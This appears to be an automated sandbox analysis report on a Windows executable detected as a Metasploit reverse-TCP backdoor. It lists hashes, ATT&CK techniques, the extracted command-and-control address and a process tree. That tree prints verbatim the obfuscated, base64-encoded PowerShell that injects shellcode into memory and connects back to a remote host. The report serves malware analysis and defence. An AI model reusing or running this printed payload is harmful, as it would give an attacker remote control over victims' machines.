metasploit | 60463c10a65048a11e37eb784b1b5f9dd9197d7bffe8cde8daa50cb56ef4d39e

Analysis

max time kernel
118s
max time network
118s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
01/01/2025, 15:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

JaffaCakes118_59f770974597fa27ef9e484feaca9cda.exe
Size

132KB
MD5

59f770974597fa27ef9e484feaca9cda
SHA1

c402332adb19c3973a64214dc313feccd1c8671d
SHA256

60463c10a65048a11e37eb784b1b5f9dd9197d7bffe8cde8daa50cb56ef4d39e
SHA512

7f31239c49dab452ff288a284bb14e5b7158239a3344599ead533b8282c7408d976fd8fadb6729840859d514c955468e1134b92bdf09ba001d65297ae01341c4
SSDEEP

3072:42sMWkzbJh1qZ9QW69hd1MMdxPe9N9uA0hu9TBfcXcOuBXJ:hbJhs7QW69hd1MMdxPe9N9uA0hu9TBZR

Score

10^/10

metasploit backdoor discovery execution trojan

Malware Config

Extracted

Family

metasploit

Version

encoder/shikata_ga_nai

Extracted

Family

metasploit

Version

windows/reverse_tcp

18.189.106.45:13167

Signatures

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Metasploit family
metasploit

Blocklisted process makes network request 10 IoCs

flow	pid	Process
2	532	powershell.exe
2	532	powershell.exe
2	532	powershell.exe
2	532	powershell.exe
2	532	powershell.exe
2	532	powershell.exe
2	532	powershell.exe
2	532	powershell.exe
2	532	powershell.exe
2	532	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2768	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
2768	powershell.exe
2796	powershell.exe
532	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2768	powershell.exe
Token: SeDebugPrivilege	2796	powershell.exe
Token: SeDebugPrivilege	532	powershell.exe

Suspicious use of WriteProcessMemory 21 IoCs

description	pid	Process	procid_target
PID 2280 wrote to memory of 1340	2280	JaffaCakes118_59f770974597fa27ef9e484feaca9cda.exe	31
PID 2280 wrote to memory of 1340	2280	JaffaCakes118_59f770974597fa27ef9e484feaca9cda.exe	31
PID 2280 wrote to memory of 1340	2280	JaffaCakes118_59f770974597fa27ef9e484feaca9cda.exe	31
PID 1340 wrote to memory of 2768	1340	cmd.exe	33
PID 1340 wrote to memory of 2768	1340	cmd.exe	33
PID 1340 wrote to memory of 2768	1340	cmd.exe	33
PID 2768 wrote to memory of 2796	2768	powershell.exe	34
PID 2768 wrote to memory of 2796	2768	powershell.exe	34
PID 2768 wrote to memory of 2796	2768	powershell.exe	34
PID 2796 wrote to memory of 532	2796	powershell.exe	35
PID 2796 wrote to memory of 532	2796	powershell.exe	35
PID 2796 wrote to memory of 532	2796	powershell.exe	35
PID 2796 wrote to memory of 532	2796	powershell.exe	35
PID 532 wrote to memory of 2576	532	powershell.exe	36
PID 532 wrote to memory of 2576	532	powershell.exe	36
PID 532 wrote to memory of 2576	532	powershell.exe	36
PID 532 wrote to memory of 2576	532	powershell.exe	36
PID 2576 wrote to memory of 1860	2576	csc.exe	37
PID 2576 wrote to memory of 1860	2576	csc.exe	37
PID 2576 wrote to memory of 1860	2576	csc.exe	37
PID 2576 wrote to memory of 1860	2576	csc.exe	37

C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_59f770974597fa27ef9e484feaca9cda.exe
"C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_59f770974597fa27ef9e484feaca9cda.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2280
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\E0AE.tmp\E0AF.tmp\E0B0.bat C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_59f770974597fa27ef9e484feaca9cda.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1340
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -windows 1 -Command "sv h -;sv o ec;sv uCu ((gv h).value.toString()+(gv o).value.toString());powershell (gv uCu).value.toString() 'JABSAEoARgAgAD0AIAAnACQATgBQAHMAIAA9ACAAJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwAQQBsAGwAbwBjAGEAdABpAG8AbgBUAHkAcABlACwAIAB1AGkAbgB0ACAAZgBsAFAAcgBvAHQAZQBjAHQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AGkAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAdgBjAHIAdAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAbQBlAG0AcwBlAHQAKABJAG4AdABQAHQAcgAgAGQAZQBzAHQALAAgAHUAaQBuAHQAIABzAHIAYwAsACAAdQBpAG4AdAAgAGMAbwB1AG4AdAApADsAJwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQATgBQAHMAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAZABiACwAMAB4AGMAMgAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQA4ACwAMAB4AGIAYgAsADAAeABkAGEALAAwAHgAYgBkACwAMAB4ADQAYQAsADAAeABjADkALAAwAHgAMgA5ACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANABiACwAMAB4ADMAMQAsADAAeAA1ADgALAAwAHgAMQA3ACwAMAB4ADgAMwAsADAAeABlADgALAAwAHgAZgBjACwAMAB4ADAAMwAsADAAeAA4ADIALAAwAHgAYQBlACwAMAB4AGEAOAAsADAAeAAzAGMALAAwAHgAYwBlACwAMAB4ADMAOQAsADAAeABhADMALAAwAHgAYgBmACwAMAB4ADIAZQAsADAAeABiAGEALAAwAHgAZABjACwAMAB4ADgAZQAsADAAeABmAGMALAAwAHgAMwAzACwAMAB4AGYAOQAsADAAeAA5ADUALAAwAHgAOABiACwAMAB4ADEANgAsADAAeAAzADIALAAwAHgAZABkACwAMAB4AGQAOQAsADAAeAA5AGEALAAwAHgAYgA5ACwAMAB4AGIAMwAsADAAeABjADkALAAwAHgAMgA5ACwAMAB4AGMAZgAsADAAeAAxAGIALAAwAHgAZgBlACwAMAB4ADkAYQAsADAAeAA3AGEALAAwAHgANwBhACwAMAB4ADMAMQAsADAAeAAxAGEALAAwAHgANABiACwAMAB4ADQAMgAsADAAeAA5AGQALAAwAHgAZAA4ACwAMAB4AGMAZAAsADAAeAAzAGUALAAwAHgAZABmACwAMAB4ADAAYwAsADAAeAAyAGUALAAwAHgANwBlACwAMAB4ADEAMAAsADAAeAA0ADEALAAwAHgAMgBmACwAMAB4ADQANwAsADAAeABlADcALAAwAHgAMgBmACwAMAB4AGMAMAAsADAAeAAxADUALAAwAHgANwBjACwAMAB4ADkAZAAsADAAeAAwAGUALAAwAHgAMQAxACwAMAB4AGMAMAAsADAAeAAxAGUALAAwAHgAMgBlACwAMAB4AGYANQAsADAAeAA5ADMALAAwAHgAZAA1ACwAMAB4ADcAMAAsADAAeAA4AGQALAAwAHgAOQBlACwAMAB4ADIAYQAsADAAeAAwADQALAAwAHgAMgAxACwAMAB4AGEAMQAsADAAeAA3AGEALAAwAHgANgBlACwAMAB4AGYAMQAsADAAeABiADkALAAwAHgAZgAxACwAMAB4ADIAOQAsADAAeAAyADIALAAwAHgAZQA5ACwAMAB4ADAANAAsADAAeAAxADkALAAwAHgAYQA3ACwAMAB4AGMAMAAsADAAeAA3ADMALAAwAHgAYQAxACwAMAB4ADkAOQAsADAAeAAyAGQALAAwAHgAMwAyACwAMAB4ADUAMgAsADAAeABlAGQALAAwAHgANQBhACwAMAB4AGMANAAsADAAeABiADIALAAwAHgAMwBmACwAMAB4ADkAYwAsADAAeAAwADYALAAwAHgAZgA1ACwAMAB4ADQAZAAsADAAeABiADAALAAwAHgAOAA4ACwAMAB4AGMAZAAsADAAeAA3ADYALAAwAHgAMgA4ACwAMAB4AGYAZgAsADAAeAAyADUALAAwAHgAOAA1ACwAMAB4AGQANQAsADAAeABmADgALAAwAHgAZgBkACwAMAB4AGYANwAsADAAeAAwADEALAAwAHgAOABjACwAMAB4AGUAMQAsADAAeAA1ADAALAAwAHgAYwAyACwAMAB4ADMANgAsADAAeABjADYALAAwAHgANgAxACwAMAB4ADAANwAsADAAeABhADAALAAwAHgAOABkACwAMAB4ADYAZQAsADAAeABlAGMALAAwAHgAYQA2ACwAMAB4AGMAYQAsADAAeAA3ADIALAAwAHgAZgAzACwAMAB4ADYAYgAsADAAeAA2ADEALAAwAHgAOABlACwAMAB4ADcAOAAsADAAeAA4AGEALAAwAHgAYQA2ACwAMAB4ADAANgAsADAAeAAzAGEALAAwAHgAYQA5ACwAMAB4ADYAMgAsADAAeAA0ADIALAAwAHgAOQA5ACwAMAB4AGQAMAAsADAAeAAzADMALAAwAHgAMgBlACwAMAB4ADQAYwAsADAAeABlAGMALAAwAHgAMgA0ACwAMAB4ADkANgAsADAAeAAzADEALAAwAHgANAA4ACwAMAB4ADIAZQAsADAAeAAzADUALAAwAHgAMgA0ACwAMAB4AGUAYwAsADAAeABjAGYALAAwAHgAYwA1ACwAMAB4ADQAOQAsADAAeABiADAALAAwAHgANAA3ACwAMAB4ADAAOQAsADAAeAA4ADcALAAwAHgANABiACwAMAB4ADkAOAAsADAAeAAwADUALAAwAHgAOQAwACwAMAB4ADMAOAAsADAAeABhAGEALAAwAHgAOABhACwAMAB4ADAAYQAsADAAeABkADcALAAwAHgAOAA2ACwAMAB4ADQAMwAsADAAeAA5ADQALAAwAHgAMgAwACwAMAB4ADkAZQAsADAAeAA0ADQALAAwAHgAMgA3ACwAMAB4AGYAZQAsADAAeAAxADgALAAwAHgAMAA0ACwAMAB4AGQANgAsADAAeABmAGYALAAwAHgANQA4ACwAMAB4ADAAYwAsADAAeAAxAGMALAAwAHgAYQBiACwAMAB4ADAAOAAsADAAeAAyADYALAAwAHgAYgA1ACwAMAB4AGQANAAsADAAeABjADIALAAwAHgAYgA2ACwAMAB4ADMAYQAsADAAeAAwADEALAAwAHgANwBlACwAMAB4AGIAZAAsADAAeABhAGMALAAwAHgAYgA4ACwAMAB4AGMAMgAsADAAeABhAGIALAAwAHgAMAAxACwAMAB4AGQANQAsADAAeAAzAGUALAAwAHgAMgBjACwAMAB4ADYAYQAsADAAeAA0AGEALAAwAHgAYgA2ACwAMAB4AGMAYQAsADAAeABkAGMALAAwAHgAYwA0ACwAMAB4ADkAOAAsADAAeAA0ADIALAAwAHgAOQBjACwAMAB4AGIANAAsADAAeAA1ADgALAAwAHgAMwAzACwAMAB4ADcANAAsADAAeABkAGYALAAwAHgANQA2ACwAMAB4ADYAYwAsADAAeAA2ADQALAAwAHgAZQAwACwAMAB4AGIAYwAsADAAeAAwADUALAAwAHgAMABlACwAMAB4ADAAZgAsADAAeAA2ADkALAAwAHgANwBkACwAMAB4AGEANgAsADAAeABiADYALAAwAHgAMwAwACwAMAB4AGYANQAsADAAeAA1ADcALAAwAHgAMwA2ACwAMAB4AGUAZgAsADAAeAA3ADMALAAwAHgANQA3ACwAMAB4AGIAYwAsADAAeAAxAGMALAAwAHgAOAAzACwAMAB4ADEAOQAsADAAeAAzADUALAAwAHgANgA4ACwAMAB4ADkANwAsADAAeABjAGQALAAwAHgAYgA1ACwAMAB4ADIANwAsADAAeABjADUALAAwAHgANQBiACwAMAB4AGMAOQAsADAAeAA5AGQALAAwAHgANgAwACwAMAB4ADYAMwAsADAAeAA1AGYALAAwAHgAMQBhACwAMAB4ADIAMwAsADAAeAAzADQALAAwAHgAZgA3ACwAMAB4ADIAMAAsADAAeAAxADIALAAwAHgANwAyACwAMAB4ADUAOAAsADAAeABkAGEALAAwAHgANwAxACwAMAB4ADAAOQAsADAAeAA1ADEALAAwAHgANABlACwAMAB4ADMAYQAsADAAeAA2ADUALAAwAHgAOQBlACwAMAB4ADkAZQAsADAAeABiAGEALAAwAHgANwA1ACwAMAB4AGMAOAAsADAAeABmADQALAAwAHgAYgBhACwAMAB4ADEAZAAsADAAeABhAGMALAAwAHgAYQBjACwAMAB4AGUAOAAsADAAeAAzADgALAAwAHgAYgAzACwAMAB4ADcAOAAsADAAeAA5AGQALAAwAHgAOQAxACwAMAB4ADIANgAsADAAeAA4ADMALAAwAHgAZgA0ACwAMAB4ADQANgAsADAAeABlADAALAAwAHgAZQBiACwAMAB4AGYAYQAsADAAeABiADEALAAwAHgAYwA2ACwAMAB4AGIAMwAsADAAeAAwADUALAAwAHgAOQA0ACwAMAB4AGQANgAsADAAeAA4ADgALAAwAHgAZAAzACwAMAB4AGQAMAAsADAAeABhAGMALAAwAHgAZQAwACwAMAB4AGUANwA7ACQAZwAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJAB6AC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAeAAxADAAMAAwACkAewAkAGcAIAA9ACAAJAB6AC4ATABlAG4AZwB0AGgAfQA7ACQAawBFAEcAPQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAGsARQBHAC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQAsACAAJAB6AFsAJABpAF0ALAAgADEAKQB9ADsAJAB3ADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABrAEUARwAsADAALAAwACwAMAApADsAZgBvAHIAIAAoADsAOwApAHsAUwB0AGEAcgB0AC0AcwBsAGUAZQBwACAANgAwAH0AOwAnADsAJABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkAFIASgBGACkAKQA7ACQAUgBEAEMATQAgAD0AIAAiAC0AZQBjACAAIgA7AGkAZgAoAFsASQBuAHQAUAB0AHIAXQA6ADoAUwBpAHoAZQAgAC0AZQBxACAAOAApAHsAJABiAHcAaQBBACAAPQAgACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0ACAAKwAgACIAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAiADsAaQBlAHgAIAAiACYAIAAkAGIAdwBpAEEAIAAkAFIARABDAE0AIAAkAGUAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQAUgBEAEMATQAgACQAZQAiADsAfQA='"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2768
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ec JABSAEoARgAgAD0AIAAnACQATgBQAHMAIAA9ACAAJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwAQQBsAGwAbwBjAGEAdABpAG8AbgBUAHkAcABlACwAIAB1AGkAbgB0ACAAZgBsAFAAcgBvAHQAZQBjAHQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AGkAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAdgBjAHIAdAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAbQBlAG0AcwBlAHQAKABJAG4AdABQAHQAcgAgAGQAZQBzAHQALAAgAHUAaQBuAHQAIABzAHIAYwAsACAAdQBpAG4AdAAgAGMAbwB1AG4AdAApADsAJwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQATgBQAHMAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAZABiACwAMAB4AGMAMgAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQA4ACwAMAB4AGIAYgAsADAAeABkAGEALAAwAHgAYgBkACwAMAB4ADQAYQAsADAAeABjADkALAAwAHgAMgA5ACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANABiACwAMAB4ADMAMQAsADAAeAA1ADgALAAwAHgAMQA3ACwAMAB4ADgAMwAsADAAeABlADgALAAwAHgAZgBjACwAMAB4ADAAMwAsADAAeAA4ADIALAAwAHgAYQBlACwAMAB4AGEAOAAsADAAeAAzAGMALAAwAHgAYwBlACwAMAB4ADMAOQAsADAAeABhADMALAAwAHgAYgBmACwAMAB4ADIAZQAsADAAeABiAGEALAAwAHgAZABjACwAMAB4ADgAZQAsADAAeABmAGMALAAwAHgAMwAzACwAMAB4AGYAOQAsADAAeAA5ADUALAAwAHgAOABiACwAMAB4ADEANgAsADAAeAAzADIALAAwAHgAZABkACwAMAB4AGQAOQAsADAAeAA5AGEALAAwAHgAYgA5ACwAMAB4AGIAMwAsADAAeABjADkALAAwAHgAMgA5ACwAMAB4AGMAZgAsADAAeAAxAGIALAAwAHgAZgBlACwAMAB4ADkAYQAsADAAeAA3AGEALAAwAHgANwBhACwAMAB4ADMAMQAsADAAeAAxAGEALAAwAHgANABiACwAMAB4ADQAMgAsADAAeAA5AGQALAAwAHgAZAA4ACwAMAB4AGMAZAAsADAAeAAzAGUALAAwAHgAZABmACwAMAB4ADAAYwAsADAAeAAyAGUALAAwAHgANwBlACwAMAB4ADEAMAAsADAAeAA0ADEALAAwAHgAMgBmACwAMAB4ADQANwAsADAAeABlADcALAAwAHgAMgBmACwAMAB4AGMAMAAsADAAeAAxADUALAAwAHgANwBjACwAMAB4ADkAZAAsADAAeAAwAGUALAAwAHgAMQAxACwAMAB4AGMAMAAsADAAeAAxAGUALAAwAHgAMgBlACwAMAB4AGYANQAsADAAeAA5ADMALAAwAHgAZAA1ACwAMAB4ADcAMAAsADAAeAA4AGQALAAwAHgAOQBlACwAMAB4ADIAYQAsADAAeAAwADQALAAwAHgAMgAxACwAMAB4AGEAMQAsADAAeAA3AGEALAAwAHgANgBlACwAMAB4AGYAMQAsADAAeABiADkALAAwAHgAZgAxACwAMAB4ADIAOQAsADAAeAAyADIALAAwAHgAZQA5ACwAMAB4ADAANAAsADAAeAAxADkALAAwAHgAYQA3ACwAMAB4AGMAMAAsADAAeAA3ADMALAAwAHgAYQAxACwAMAB4ADkAOQAsADAAeAAyAGQALAAwAHgAMwAyACwAMAB4ADUAMgAsADAAeABlAGQALAAwAHgANQBhACwAMAB4AGMANAAsADAAeABiADIALAAwAHgAMwBmACwAMAB4ADkAYwAsADAAeAAwADYALAAwAHgAZgA1ACwAMAB4ADQAZAAsADAAeABiADAALAAwAHgAOAA4ACwAMAB4AGMAZAAsADAAeAA3ADYALAAwAHgAMgA4ACwAMAB4AGYAZgAsADAAeAAyADUALAAwAHgAOAA1ACwAMAB4AGQANQAsADAAeABmADgALAAwAHgAZgBkACwAMAB4AGYANwAsADAAeAAwADEALAAwAHgAOABjACwAMAB4AGUAMQAsADAAeAA1ADAALAAwAHgAYwAyACwAMAB4ADMANgAsADAAeABjADYALAAwAHgANgAxACwAMAB4ADAANwAsADAAeABhADAALAAwAHgAOABkACwAMAB4ADYAZQAsADAAeABlAGMALAAwAHgAYQA2ACwAMAB4AGMAYQAsADAAeAA3ADIALAAwAHgAZgAzACwAMAB4ADYAYgAsADAAeAA2ADEALAAwAHgAOABlACwAMAB4ADcAOAAsADAAeAA4AGEALAAwAHgAYQA2ACwAMAB4ADAANgAsADAAeAAzAGEALAAwAHgAYQA5ACwAMAB4ADYAMgAsADAAeAA0ADIALAAwAHgAOQA5ACwAMAB4AGQAMAAsADAAeAAzADMALAAwAHgAMgBlACwAMAB4ADQAYwAsADAAeABlAGMALAAwAHgAMgA0ACwAMAB4ADkANgAsADAAeAAzADEALAAwAHgANAA4ACwAMAB4ADIAZQAsADAAeAAzADUALAAwAHgAMgA0ACwAMAB4AGUAYwAsADAAeABjAGYALAAwAHgAYwA1ACwAMAB4ADQAOQAsADAAeABiADAALAAwAHgANAA3ACwAMAB4ADAAOQAsADAAeAA4ADcALAAwAHgANABiACwAMAB4ADkAOAAsADAAeAAwADUALAAwAHgAOQAwACwAMAB4ADMAOAAsADAAeABhAGEALAAwAHgAOABhACwAMAB4ADAAYQAsADAAeABkADcALAAwAHgAOAA2ACwAMAB4ADQAMwAsADAAeAA5ADQALAAwAHgAMgAwACwAMAB4ADkAZQAsADAAeAA0ADQALAAwAHgAMgA3ACwAMAB4AGYAZQAsADAAeAAxADgALAAwAHgAMAA0ACwAMAB4AGQANgAsADAAeABmAGYALAAwAHgANQA4ACwAMAB4ADAAYwAsADAAeAAxAGMALAAwAHgAYQBiACwAMAB4ADAAOAAsADAAeAAyADYALAAwAHgAYgA1ACwAMAB4AGQANAAsADAAeABjADIALAAwAHgAYgA2ACwAMAB4ADMAYQAsADAAeAAwADEALAAwAHgANwBlACwAMAB4AGIAZAAsADAAeABhAGMALAAwAHgAYgA4ACwAMAB4AGMAMgAsADAAeABhAGIALAAwAHgAMAAxACwAMAB4AGQANQAsADAAeAAzAGUALAAwAHgAMgBjACwAMAB4ADYAYQAsADAAeAA0AGEALAAwAHgAYgA2ACwAMAB4AGMAYQAsADAAeABkAGMALAAwAHgAYwA0ACwAMAB4ADkAOAAsADAAeAA0ADIALAAwAHgAOQBjACwAMAB4AGIANAAsADAAeAA1ADgALAAwAHgAMwAzACwAMAB4ADcANAAsADAAeABkAGYALAAwAHgANQA2ACwAMAB4ADYAYwAsADAAeAA2ADQALAAwAHgAZQAwACwAMAB4AGIAYwAsADAAeAAwADUALAAwAHgAMABlACwAMAB4ADAAZgAsADAAeAA2ADkALAAwAHgANwBkACwAMAB4AGEANgAsADAAeABiADYALAAwAHgAMwAwACwAMAB4AGYANQAsADAAeAA1ADcALAAwAHgAMwA2ACwAMAB4AGUAZgAsADAAeAA3ADMALAAwAHgANQA3ACwAMAB4AGIAYwAsADAAeAAxAGMALAAwAHgAOAAzACwAMAB4ADEAOQAsADAAeAAzADUALAAwAHgANgA4ACwAMAB4ADkANwAsADAAeABjAGQALAAwAHgAYgA1ACwAMAB4ADIANwAsADAAeABjADUALAAwAHgANQBiACwAMAB4AGMAOQAsADAAeAA5AGQALAAwAHgANgAwACwAMAB4ADYAMwAsADAAeAA1AGYALAAwAHgAMQBhACwAMAB4ADIAMwAsADAAeAAzADQALAAwAHgAZgA3ACwAMAB4ADIAMAAsADAAeAAxADIALAAwAHgANwAyACwAMAB4ADUAOAAsADAAeABkAGEALAAwAHgANwAxACwAMAB4ADAAOQAsADAAeAA1ADEALAAwAHgANABlACwAMAB4ADMAYQAsADAAeAA2ADUALAAwAHgAOQBlACwAMAB4ADkAZQAsADAAeABiAGEALAAwAHgANwA1ACwAMAB4AGMAOAAsADAAeABmADQALAAwAHgAYgBhACwAMAB4ADEAZAAsADAAeABhAGMALAAwAHgAYQBjACwAMAB4AGUAOAAsADAAeAAzADgALAAwAHgAYgAzACwAMAB4ADcAOAAsADAAeAA5AGQALAAwAHgAOQAxACwAMAB4ADIANgAsADAAeAA4ADMALAAwAHgAZgA0ACwAMAB4ADQANgAsADAAeABlADAALAAwAHgAZQBiACwAMAB4AGYAYQAsADAAeABiADEALAAwAHgAYwA2ACwAMAB4AGIAMwAsADAAeAAwADUALAAwAHgAOQA0ACwAMAB4AGQANgAsADAAeAA4ADgALAAwAHgAZAAzACwAMAB4AGQAMAAsADAAeABhAGMALAAwAHgAZQAwACwAMAB4AGUANwA7ACQAZwAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJAB6AC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAeAAxADAAMAAwACkAewAkAGcAIAA9ACAAJAB6AC4ATABlAG4AZwB0AGgAfQA7ACQAawBFAEcAPQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAGsARQBHAC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQAsACAAJAB6AFsAJABpAF0ALAAgADEAKQB9ADsAJAB3ADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABrAEUARwAsADAALAAwACwAMAApADsAZgBvAHIAIAAoADsAOwApAHsAUwB0AGEAcgB0AC0AcwBsAGUAZQBwACAANgAwAH0AOwAnA